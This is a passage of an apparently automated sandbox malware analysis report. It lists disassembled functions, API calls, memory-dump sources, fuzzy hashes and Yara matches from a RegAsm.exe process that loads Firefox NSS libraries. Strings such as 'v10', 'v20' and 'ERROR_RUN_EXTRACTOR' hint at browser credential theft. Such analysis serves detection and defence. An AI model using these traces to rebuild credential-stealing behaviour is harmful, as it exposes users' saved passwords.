                                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C1BAF37
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                                        • String ID:
                                                                                                        • API String ID: 3714604333-0
                                                                                                        • Opcode ID: 57191d110526b6c1cfad87660e44993b21f905fa259ca0c6566053b6ef8066b7
                                                                                                        • Instruction ID: 53f8941871275d0f7f09ee3cfc29fe74b24f71ac1930a80f7e2c916506db7a1d
                                                                                                        • Opcode Fuzzy Hash: 57191d110526b6c1cfad87660e44993b21f905fa259ca0c6566053b6ef8066b7
                                                                                                        • Instruction Fuzzy Hash: 382135B2909204ABEB108F188C41B9F7BE4AF9572CF144319FD58AB780E731D5188BA7
                                                                                                        Function 6C23EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C23EE85
                                                                                                        • realloc.MOZGLUE(6F09BAB5,?), ref: 6C23EEAE
                                                                                                        • PORT_Alloc_Util.NSS3(?), ref: 6C23EEC5
                                                                                                          • Part of subcall function 6C210BE0: malloc.MOZGLUE(6C208D2D,?,00000000,?), ref: 6C210BF8
                                                                                                          • Part of subcall function 6C210BE0: TlsGetValue.KERNEL32(6C208D2D,?,00000000,?), ref: 6C210C15
                                                                                                        • htonl.WSOCK32(?), ref: 6C23EEE3
                                                                                                        • htonl.WSOCK32(00000000,?), ref: 6C23EEED
                                                                                                        • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C23EF01
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1351805024-0
                                                                                                        • Opcode ID: 7586f62ccbf0c631705ab2110a23545922071b258fd26570dfff198dac335b31
                                                                                                        • Instruction ID: 5cda959d4b89d41d9bd5cf7948cf8923af28acd1ca2c3c6b7f448122c080cce7
                                                                                                        • Opcode Fuzzy Hash: 7586f62ccbf0c631705ab2110a23545922071b258fd26570dfff198dac335b31
                                                                                                        • Instruction Fuzzy Hash: 0821E771A002299FDF109F28DC81B9AB7A4EF45768F158169EC1D9B681E730EC18C7E2
                                                                                                        Function 6C1EEE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C1EEE49
                                                                                                          • Part of subcall function 6C20FAB0: free.MOZGLUE(?,-00000001,?,?,6C1AF673,00000000,00000000), ref: 6C20FAC7
                                                                                                        • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C1EEE5C
                                                                                                        • PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C1EEE77
                                                                                                        • PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C1EEE9D
                                                                                                        • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C1EEEB3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
                                                                                                        • String ID:
                                                                                                        • API String ID: 886189093-0
                                                                                                        • Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
                                                                                                        • Instruction ID: 97c17b66126e411bbbba38c8e5ffdd46e838d926ee9e482013fb0a0d07b40b6a
                                                                                                        • Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
                                                                                                        • Instruction Fuzzy Hash: A921C0B6A006146BEB118E68DC81EABB7A8AF49708F094164FD08DB352E671ED14C7E1
                                                                                                        Function 6C204820 Relevance: 9.1, APIs: 6, Instructions: 74stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C204EB8,?), ref: 6C204884
                                                                                                          • Part of subcall function 6C208800: TlsGetValue.KERNEL32(?,6C21085A,00000000,?,6C1B8369,?), ref: 6C208821
                                                                                                          • Part of subcall function 6C208800: TlsGetValue.KERNEL32(?,?,6C21085A,00000000,?,6C1B8369,?), ref: 6C20883D
                                                                                                          • Part of subcall function 6C208800: EnterCriticalSection.KERNEL32(?,?,?,6C21085A,00000000,?,6C1B8369,?), ref: 6C208856
                                                                                                          • Part of subcall function 6C208800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C208887
                                                                                                          • Part of subcall function 6C208800: PR_Unlock.NSS3(?,?,?,?,6C21085A,00000000,?,6C1B8369,?), ref: 6C208899
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C204EB8,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C20484C
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C204EB8,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C20486D
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C204899
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2048A9
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2048B8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$CriticalEnterSectionUnlockstrcmp$CondErrorWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 2226052791-0
                                                                                                        • Opcode ID: c11ee31c9c6382f7d9d449acd86de60f74cec27e07c52429ba010cdf66875f3f
                                                                                                        • Instruction ID: 4658a4977b478605065e399c44dc651f636c9db5150ec0e0c44048932b69521b
                                                                                                        • Opcode Fuzzy Hash: c11ee31c9c6382f7d9d449acd86de60f74cec27e07c52429ba010cdf66875f3f
                                                                                                        • Instruction Fuzzy Hash: 07210B76F002499FEF005FA5DD85A577778FF16359B044936EE0547A01EB21E824C7A2
                                                                                                        Function 6C246840 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_NewMonitor.NSS3(00000000,?,6C24AA9B,?,?,?,?,?,?,?,00000000,?,6C2480C1), ref: 6C246846
                                                                                                          • Part of subcall function 6C1A1770: calloc.MOZGLUE(00000001,0000019C,?,6C1A15C2,?,?,?,?,?,00000001,00000040), ref: 6C1A178D
                                                                                                        • PR_NewMonitor.NSS3(00000000,?,6C24AA9B,?,?,?,?,?,?,?,00000000,?,6C2480C1), ref: 6C246855
                                                                                                          • Part of subcall function 6C208680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C1B55D0,00000000,00000000), ref: 6C20868B
                                                                                                          • Part of subcall function 6C208680: PR_NewLock.NSS3(00000000,00000000), ref: 6C2086A0
                                                                                                          • Part of subcall function 6C208680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C2086B2
                                                                                                          • Part of subcall function 6C208680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C2086C8
                                                                                                          • Part of subcall function 6C208680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C2086E2
                                                                                                          • Part of subcall function 6C208680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C2086EC
                                                                                                          • Part of subcall function 6C208680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C208700
                                                                                                        • PR_NewMonitor.NSS3(?,6C24AA9B,?,?,?,?,?,?,?,00000000,?,6C2480C1), ref: 6C24687D
                                                                                                          • Part of subcall function 6C1A1770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C1A18DE
                                                                                                          • Part of subcall function 6C1A1770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C1A18F1
                                                                                                        • PR_NewMonitor.NSS3(?,6C24AA9B,?,?,?,?,?,?,?,00000000,?,6C2480C1), ref: 6C24688C
                                                                                                          • Part of subcall function 6C1A1770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C1A18FC
                                                                                                          • Part of subcall function 6C1A1770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C1A198A
                                                                                                        • PR_NewLock.NSS3 ref: 6C2468A5
                                                                                                          • Part of subcall function 6C2798D0: calloc.MOZGLUE(00000001,00000084,6C1A0936,00000001,?,6C1A102C), ref: 6C2798E5
                                                                                                        • PR_NewLock.NSS3 ref: 6C2468B4
                                                                                                          • Part of subcall function 6C2798D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C279946
                                                                                                          • Part of subcall function 6C2798D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C1316B7,00000000), ref: 6C27994E
                                                                                                          • Part of subcall function 6C2798D0: free.MOZGLUE(00000000), ref: 6C27995E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 200661885-0
                                                                                                        • Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
                                                                                                        • Instruction ID: f47379ce1f2406ffdd44abb8fd56e98010375efb51447f8e39abc67c31977172
                                                                                                        • Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
                                                                                                        • Instruction Fuzzy Hash: D7011DB4A02F0B87E7656BB688503E777E55F02289F10443E9C69C6B40EF71D40CCBA1
                                                                                                        Function 0041210E Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 36stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • StrStrA.SHLWAPI(?,00000000,?,?,?,00413794,00000000,00000010), ref: 00412119
                                                                                                        • lstrcpynA.KERNEL32(C:\Users\user\Desktop\,?,00000000,?), ref: 00412132
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00412144
                                                                                                        • wsprintfA.USER32 ref: 00412156
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpynlstrlenwsprintf
                                                                                                        • String ID: %s%s$C:\Users\user\Desktop\
                                                                                                        • API String ID: 1206339513-438050915
                                                                                                        • Opcode ID: e78d85b104e7b8f8ae18f25e6644af7b5d694852cb88d63dd502dd69edac9df2
                                                                                                        • Instruction ID: 2b65b01ea0560ea7e18c8daf8da5e1637e4a778ce13f385dfd922e5b6f13eae1
                                                                                                        • Opcode Fuzzy Hash: e78d85b104e7b8f8ae18f25e6644af7b5d694852cb88d63dd502dd69edac9df2
                                                                                                        • Instruction Fuzzy Hash: 83F0E9322002157FDF091F99DC48D9B7FAEDF45666F000061F908D2211C6775F1586E5
                                                                                                        Function 6C19AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C19AFDA
                                                                                                        Strings
                                                                                                        • misuse, xrefs: 6C19AFCE
                                                                                                        • unable to delete/modify collation sequence due to active statements, xrefs: 6C19AF5C
                                                                                                        • %s at line %d of [%.10s], xrefs: 6C19AFD3
                                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C19AFC4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_log
                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                        • API String ID: 632333372-924978290
                                                                                                        • Opcode ID: 2298380a7cfdb3693c1837d60838e9f8ff045e7f7a0ac8d867fd89a2025925dc
                                                                                                        • Instruction ID: 44a1ab830afd435141be5bafa526e1cf5a665ded0d6bc1f42d2a3594240d86ba
                                                                                                        • Opcode Fuzzy Hash: 2298380a7cfdb3693c1837d60838e9f8ff045e7f7a0ac8d867fd89a2025925dc
                                                                                                        • Instruction Fuzzy Hash: 1C91E275E012158FDB04CF29C850BAEB7F1BF49314F1945A8E865ABB91C734EC05CBA0
                                                                                                        Function 0040826D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00408307
                                                                                                        • LocalAlloc.KERNEL32(00000040,-0000001F,00000000,?,?), ref: 0040833C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocLocal_memset
                                                                                                        • String ID: ERROR_RUN_EXTRACTOR$v10$v20
                                                                                                        • API String ID: 52611349-380572819
                                                                                                        • Opcode ID: 93e336829a09b04c9a22f2871bb72d6da27ca2d0679549906ea092d0de62e08c
                                                                                                        • Instruction ID: daba9ed892d092cabdd565eab6a30784efdfa5406d791c1b040b6213e04440cf
                                                                                                        • Opcode Fuzzy Hash: 93e336829a09b04c9a22f2871bb72d6da27ca2d0679549906ea092d0de62e08c
                                                                                                        • Instruction Fuzzy Hash: 0141B3B2A00118ABCF10DFA5CD42ADE3BB8AB84714F15413BFD40F7280EB78D9458B99
                                                                                                        Function 6C0CF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C0CF480
                                                                                                          • Part of subcall function 6C09F100: LoadLibraryW.KERNEL32(shell32,?,6C10D020), ref: 6C09F122
                                                                                                          • Part of subcall function 6C09F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C09F132
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6C0CF555
                                                                                                          • Part of subcall function 6C0A14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C0A1248,6C0A1248,?), ref: 6C0A14C9
                                                                                                          • Part of subcall function 6C0A14B0: memcpy.VCRUNTIME140(?,6C0A1248,00000000,?,6C0A1248,?), ref: 6C0A14EF
                                                                                                          • Part of subcall function 6C09EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C09EEE3
                                                                                                        • CreateFileW.KERNEL32 ref: 6C0CF4FD
                                                                                                        • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C0CF523
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                        • String ID: \oleacc.dll
                                                                                                        • API String ID: 2595878907-3839883404
                                                                                                        • Opcode ID: 047d7c6297be38dcf8ecdddb2ddaf5234b6660bcd85f737c0e70829f293f27e9
                                                                                                        • Instruction ID: 26491c69b14cdd3f3ceb1f16e28760b6ed8df335265129c22d0514bf9053dee7
                                                                                                        • Opcode Fuzzy Hash: 047d7c6297be38dcf8ecdddb2ddaf5234b6660bcd85f737c0e70829f293f27e9
                                                                                                        • Instruction Fuzzy Hash: 7E419D707087109FE720DF68C984B9EB7F8AF84318F504A1CF69483650EB74EA498B93
                                                                                                        Function 0041BFC6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,759183C0,00000000,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C019
                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0041C58F,?,00416F27), ref: 0041C049
                                                                                                        • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C075
                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C083
                                                                                                          • Part of subcall function 0041B991: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,039E2548), ref: 0041B9C5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                                                        • String ID: 'oA
                                                                                                        • API String ID: 3986731826-570265369
                                                                                                        • Opcode ID: 5a4a7b219b2098a5fb872391a6b6813c9c431c7c45877e2e4ef416b00ba26d56
                                                                                                        • Instruction ID: 1898f3f14c485dfe9e4ef6ed33e1055e23cef853a536fbea19f5c84a704e6684
                                                                                                        • Opcode Fuzzy Hash: 5a4a7b219b2098a5fb872391a6b6813c9c431c7c45877e2e4ef416b00ba26d56
                                                                                                        • Instruction Fuzzy Hash: DA416D71800209DFCF14DFA9C880AEEBFF9FF48310F10416AE855EA256E3359985CBA4
                                                                                                        Function 6C226DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_MillisecondsToInterval.NSS3(?), ref: 6C226E36
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C226E57
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • PR_MillisecondsToInterval.NSS3(?), ref: 6C226E7D
                                                                                                        • PR_MillisecondsToInterval.NSS3(?), ref: 6C226EAA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
